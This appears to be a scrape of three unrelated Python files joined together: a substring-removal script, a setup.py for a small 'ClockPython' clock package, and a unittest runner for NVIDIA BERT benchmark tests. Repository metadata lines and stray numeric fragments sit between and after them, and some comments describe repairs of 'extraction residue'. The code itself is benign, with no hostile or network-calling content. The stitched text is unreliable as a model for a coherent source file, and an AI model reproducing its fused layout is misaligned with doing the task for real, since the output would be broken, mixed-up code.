# Repeatedly delete every occurrence of the first input string from the
# second until none remain, then print what is left.
# Fix: the final print line (and the first input line) had extraction
# residue fused onto them, making the file a syntax error; restored clean.
first_str = input()
second_str = input()
while first_str in second_str:
    # str.replace removes all current occurrences at once; the loop handles
    # occurrences newly formed by a removal.
    second_str = second_str.replace(first_str, '')
print(second_str)
setup.py | gingerphoenix10/ClockPython | 0 | 12767449 | <filename>setup.py<gh_stars>0
# Packaging script for the ClockPython distribution.
# Fix: the closing ')' line had extraction residue fused onto it
# (") | 1.5 | 2"), making the file a syntax error; restored clean.
from setuptools import setup

# Use the README as the long description shown on PyPI.
with open("README.md", "r") as fh:
    long_description = fh.read()

setup(
    name='ClockPython',
    version='0.0.1',
    description='Gets the current 12 or 24 hour time',
    py_modules=["clockpython"],
    package_dir={'': 'src'},
    classifiers=[
        "Programming Language :: Python :: 3.10",
        "License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)",
        "Operating System :: OS Independent",
    ],
    long_description=long_description,
    long_description_content_type="text/markdown",
    extras_require={
        "dev": [
            "pytest>=3.7",
        ],
    },
    url="https://github.com/gingerphoenix10/ClockPython",
    author="gingerphoenix10",
    author_email="<EMAIL>"
)
Supermicro/benchmarks/bert/implementations/pytorch_SYS-420GP-TNAR/unit_test/test_main.py | gglin001/training_results_v1.1 | 27 | 12767450 | # NVIDIA
import unittest
from test_bert_batch_1 import *
#from test_bert_batch_7 import *
from test_embeddings_batch_1 import *
from test_encoders_batch_1 import *
# Run every test case pulled in by the star-imports above when this file
# is executed directly.
if __name__ == '__main__':
    unittest.main(verbosity=2)
| 1.257813 | 1 |